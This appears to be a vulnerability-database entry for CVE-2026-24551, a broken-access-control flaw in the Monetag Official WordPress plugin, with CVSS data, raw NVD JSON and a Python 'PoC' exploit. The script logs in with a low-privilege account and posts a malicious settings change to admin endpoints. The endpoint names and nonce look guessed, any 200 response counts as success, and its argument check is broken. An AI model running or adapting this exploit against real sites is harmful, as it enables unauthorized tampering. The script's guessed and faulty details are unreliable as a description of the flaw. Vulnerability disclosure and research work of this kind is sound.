Security Vulnerability Report
中文
CVE-2026-24551 CVSS 5.4 MEDIUM

CVE-2026-24551

Published: 2026-01-23 15:16:12
Last Modified: 2026-04-28 15:16:13

Description

Missing Authorization vulnerability in monetagwp Monetag Official Plugin monetag-official allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Monetag Official Plugin: from n/a through <= 1.1.3.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Monetag Official Plugin <= 1.1.3
Monetag Official Plugin from n/a through 1.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24551 PoC - Monetag Official Plugin Missing Authorization # Target: WordPress site with Monetag Official Plugin <= 1.1.3 import requests import sys def exploit_monetag(target_url, username, password): """ Exploit missing authorization vulnerability in Monetag Official Plugin. This PoC demonstrates how a low-privilege user can access admin functions. """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Access privileged function without proper authorization # Target the vulnerable endpoint in Monetag plugin vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=monetag_admin_action', '/wp-admin/admin.php?page=monetag-settings', ] for endpoint in vulnerable_endpoints: exploit_url = f"{target_url}{endpoint}" exploit_data = { 'monetag_action': 'update_settings', 'monetag_nonce': 'low_priv_nonce', # May not be properly validated 'new_setting': 'malicious_value' } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200: print(f"[+] Potential unauthorized access to: {endpoint}") print(f" Response: {response.text[:200]}") return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_monetag(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24551", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:11.717", "lastModified": "2026-04-28T15:16:13.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in monetagwp Monetag Official Plugin monetag-official allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Monetag Official Plugin: from n/a through <= 1.1.3."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en el plugin oficial de Monetag monetagwp monetag-official permite explotar niveles de seguridad de control de acceso incorrectamente configurados. Este problema afecta al plugin oficial de Monetag: desde n/d hasta &lt;= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/monetag-official/vulnerability/wordpress-monetag-official-plugin-plugin-1-1-3-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}